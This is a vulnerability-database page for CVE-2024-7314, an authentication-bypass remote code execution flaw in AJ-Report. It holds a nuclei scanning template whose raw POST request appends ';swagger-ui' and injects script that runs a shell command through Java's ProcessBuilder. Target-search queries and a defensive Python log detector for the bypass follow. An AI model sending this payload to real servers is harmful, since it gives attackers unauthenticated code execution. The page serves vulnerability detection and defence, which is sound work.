
AJ-Report < 1.4.1 - Remote Code Execution

02 Jul 2026 09:36:57 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

AJ-Report before 1.4.1 has a critical remote code execution vulnerability via authentication bypass.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2024-7314 | 2 Aug 2024 19:52 | circl |
| CNNVD | AJ-Report security vulnerability | 2 Aug 2024 00:00 | cnnvd |
| CVE | CVE-2024-7314 | 2 Aug 2024 16:33 | cve |
| Cvelist | CVE-2024-7314 anji-plus AJ-Report Authentication Bypass | 2 Aug 2024 16:33 | cvelist |
| NVD | CVE-2024-7314 | 2 Aug 2024 17:16 | nvd |
| OSV | CVE-2024-7314 | 2 Aug 2024 17:16 | osv |
| Positive Technologies | PT-2024-38260 · Anji Plus · Anji-Plus Aj-Report | 2 Aug 2024 00:00 | ptsecurity |
| RedhatCVE | CVE-2024-7314 | 5 Feb 2025 12:00 | redhatcve |
| VulnCheck KEV | VulnCheck KEV: CVE-2024-7314 | 27 May 2025 00:00 | vulncheck_kev |
| Vulnrichment | CVE-2024-7314 anji-plus AJ-Report Authentication Bypass | 2 Aug 2024 16:33 | vulnrichment |

id: CVE-2024-7314

info:
  name: AJ-Report < 1.4.1 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    AJ-Report before version 1.4.1 is affected by an authentication bypass vulnerability. A remote and unauthenticated attacker can append ";swagger-ui" to HTTP requests to bypass authentication and execute arbitrary Java code on the victim server through script engine injection in the validation rules functionality.
  impact: |
    Unauthenticated attackers can bypass authentication and execute arbitrary Java code on the server through script engine injection, achieving complete system compromise and access to all application data.
  remediation: |
    Upgrade to AJ-Report version 1.4.1 or later which includes security fixes.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/aj-report/CNVD-2024-15077
    - https://github.com/yuebusao/AJ-REPORT-EXPLOIT
    - https://xz.aliyun.com/t/14460
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-280
    epss-score: 0.51468
    epss-percentile: 0.98807
    cve-id: CVE-2024-7314
    cpe: cpe:2.3:a:anji-plus:report:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: anji-plus
    product: report
    fofa-query: app="AJ-Report"
    shodan-query: http.title:"AJ-Report"
  tags: cve,cve2024,aj-report,anji-plus,rce,swagger,vkev,vuln

http:
  - raw:
      - |
        POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8

        {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
          - 'data":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
# digest: 4b0a00483046022100dafcb1653ae9106cfa03f311490a10b44ff13dde20e7dc9094590d2913629588022100d2fc03c36242e5930b8af9d35ff532d0e415f2900042c47eaa3b93f7d86cc727:922c64590222798bb761d5b6d8e72950
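
A defender-side check for the request shape this template sends, as an added example that is not part of the template or the ProjectDiscovery repository: it scans access-log lines for paths where "swagger-ui" appears only as a ";" path parameter rather than as a real path segment. The common/combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Request part of a common/combined access-log line (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
MARKER = "swagger-ui"  # suffix named in the template description


def strip_path_params(path):
    """Drop the ';param' part of every segment, leaving the path without path parameters."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def is_bypass_attempt(target):
    """True when 'swagger-ui' occurs only inside a ';' path parameter."""
    # Normalise first: logs may record the semicolon percent-encoded.
    path = unquote(urlsplit(target).path).lower()
    if MARKER not in path or ";" not in path:
        return False
    return MARKER not in strip_path_params(path)


def find_bypass_attempts(lines):
    """Return (ip, method, target, status) for every flagged log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_bypass_attempt(m["target"]):
            hits.append((m["ip"], m["method"], m["target"], int(m["status"])))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Aug/2024:10:00:01 +0000] "GET /swagger-ui/index.html HTTP/1.1" 200 3120',
    '198.51.100.7 - - [02/Aug/2024:10:00:05 +0000] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 200 211',
    '198.51.100.7 - - [02/Aug/2024:10:00:09 +0000] "POST /dataSetParam/verification%3Bswagger-ui HTTP/1.1" 401 98',
    '192.0.2.10 - - [02/Aug/2024:10:00:12 +0000] "POST /dataSetParam/verification HTTP/1.1" 401 98',
    '192.0.2.10 - - [02/Aug/2024:10:00:15 +0000] "GET /swagger-ui/index.html;jsessionid=ABC HTTP/1.1" 200 3120',
]

if __name__ == "__main__":
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print(hit)
```

A flagged request that returned 200 on a host running AJ-Report before 1.4.1 warrants incident triage; genuine Swagger UI requests, including ones carrying an unrelated path parameter, are not flagged.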

Scores (04 Feb 2026 07:00, current): Vulners AI Score 6.2 (Medium risk) | CVSS 3.1: 9.8 | EPSS: 0.51468